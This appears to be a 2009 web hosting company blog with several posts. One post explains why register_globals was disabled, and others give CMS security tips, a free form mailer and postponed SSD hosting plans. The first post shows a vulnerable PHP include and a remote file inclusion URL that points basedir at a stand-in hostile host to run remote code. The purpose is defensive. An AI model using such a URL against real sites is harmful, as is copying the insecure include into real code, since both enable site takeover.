24June2009
Posted by Norman under: Guides.
You may aware that we finally decided to disable register_global in PHP by default in all servers, which annoyed some users … and while I was reading this great book I found a good example in how easy to HACK/CRAK PHP website when register_globals is turned ON:
imagine index.php file that contains the following code:
<?php
require_once ($basedir.’/somecode.php’);
// More code that is perfectly safe follows
?>
The code above usually found in %99 of any PHP software, code simply includes legitimate somecode.php PHP file that contains more PHP code and process it.
If register_globals turned ON, the hacker can request your index.php file using an url like this one:
http://www.yourwebsite.com/index.php?basedir=http://www.nastysite.com
The result is that our vulnerable code will load, and execute code in http://www.nastysite.com/somecode.php. That means that the cracker is able to load, and execute his own somecode.php, which is arbitrary PHP code, intended to hack your site.
I hope this explains why we disabled register_globals in all servers.
23June2009
Posted by Norman under: Guides.
As many of you know there has been a large surge of hacking activity targeted websites that use open source software (Specially Joomla, PHPBB and more), The attackers are using various exploits in older versions of this open source software to gain access to whole hosting account and use the hosting account to send spam or distribute malware, we even have seen attacks that
install full software like Wikis and Forums to spam search engines and this “planned” attacks is impossible to recover and we have to terminate the infected hosting accounts.
Fortunately, %99 of this attacks can be avoided by following very easy steps:
- If you installed (or installing) PHP or CGI software to try it out (Like PHPBB forum, Joomla CMS,..etc) and you no longer use this software then simply delete it and delete its DB, if you used Fantastico installer to install the software, then use Fantastico to delete the installation.
- Same thing apply to Software plug-ins and themes, if you no longer use a theme/template then remove it, if you no longer use a plug-in then delete it
- When Installing software, always choose user name and password for software administration different than your main hosting account user name and password, if your software compromised, the attacker will not able to gain access to whole hosting account or email.
- When Installing software, Avoid using easy to guess logins like username: test and password: test
- 6, 7, 8, 9, 10: If you installed software and want to continue using it, then keep it up to date (including any themes, plug-ins, widgets), subscribe in the software mailing lists or RSS feeds to get any security updates and batch/upgrade your copy of this software as soon as possible.
As usual, feel free to contact us using the helpdesk if you have any questions.
31May2009
Posted by Norman under: Uncategorized.
This is full screen shot of how 2MHost website was look like in 2002 :) .. Click on the image below to enlarge.
12April2009
Posted by Norman under: Guides.
I just want to mention that we have added a free PHP form to mail to use in your website.
http://www.2mhost.com/desk4.2/kb.cgi?do=read&id=73&lang=en
The form mailer needs minimal configuration and will work with ANY HTML form, the sample html form (included in the download file) show simple way to validate forms, using Jquery and Validation plugin.
hope you like it.
30March2009
Posted by Norman under: Uncategorized.
Our plans for SSD drives based hosting servers has been postponed for a while, although the performance was amazing, the total space available in server was very small, the best space we could got from RAID-5 of 4 drives was only 130 GB, that way, the hosting package price will be started from $10/mo for 1 GB space, Although we have managed to increase the space to 5 GB for media files (movies, zip files, .etc) but still, we think $10/mo will be too much for this relatively small space.
again, project is postponed, we can’t resist to be first web hosting provider who uses SSD drives, but what we can do? any feed back is really appreciated.
